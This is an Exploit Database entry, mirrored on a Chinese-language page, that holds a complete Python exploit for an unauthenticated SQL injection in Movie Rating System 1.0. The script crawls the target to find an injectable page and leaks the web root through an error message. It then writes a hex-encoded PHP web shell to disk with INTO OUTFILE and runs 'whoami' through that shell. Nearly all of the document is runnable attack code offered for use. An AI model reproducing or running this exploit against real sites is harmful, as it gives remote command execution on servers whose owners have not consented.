Movie Rating System 1.0 – SQLi to RCE (Unauthenticated)

• Exploit Database
• 39 阅读

• 作者： Tagoletta
  日期： 2022-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50622/

• # Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
  # Date: 22/12/2021
  # Exploit Author: Tagoletta (Tağmaç)
  # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
  # Version: 1.0
  # Tested on: Ubuntu
  # This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.
  
  import requests
  import random
  import string
  from bs4 import BeautifulSoup
  
  url = input("TARGET = ")
  
  if not url.startswith('http://') and not url.startswith('https://'):
  url = "http://" + url
  if not url.endswith('/'):
  url = url + "/"
  
  payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
  
  let = string.ascii_lowercase
  shellname = ''.join(random.choice(let) for i in range(15))
  
  resp = requests.get(url)
  htmlParser = BeautifulSoup(resp.text, 'html.parser')
  
  getMenu = htmlParser.findAll("a", {"class": "nav-link"})
  selectPage = ""
  for i in getMenu:
  if "movie" in i.text.lower():
  selectPage = i["href"]
  break
  
  selectPage = selectPage.replace("./","")
  findSql = url + selectPage
  resp = requests.get(findSql)
  htmlParser = BeautifulSoup(resp.text, 'html.parser')
  movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})
  
  sqlPage = movieList[0]["href"]
  sqlPage = sqlPage.replace("./","")
  
  sqlPage = url + sqlPage
  
  print("\nFinding path")
  
  findPath = requests.get(sqlPage + '\'')
  findPath = findPath.text[findPath.text.index("<b>Warning</b>:")+17:findPath.text.index("</b> on line ")]
  findPath = findPath[findPath.index("<b>")+3:len(findPath)]
  print("injection page: "+sqlPage)
  
  parser = findPath.split('\\')
  parser.pop()
  findPath = ""
  for find in parser:
  findPath += find + "/"
  
  print("\nFound Path : " + findPath)
  
  SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
  SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
  SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
  
  print("\n\nShell Uploading...")
  status = requests.get(sqlPage+SQLtoRCE)
  
  shellOutput = requests.get(url+shellname+".php?tago=whoami")
  print("\n\nShell Output : "+shellOutput.text)
  print("\nShell Path : " + url+shellname+".php")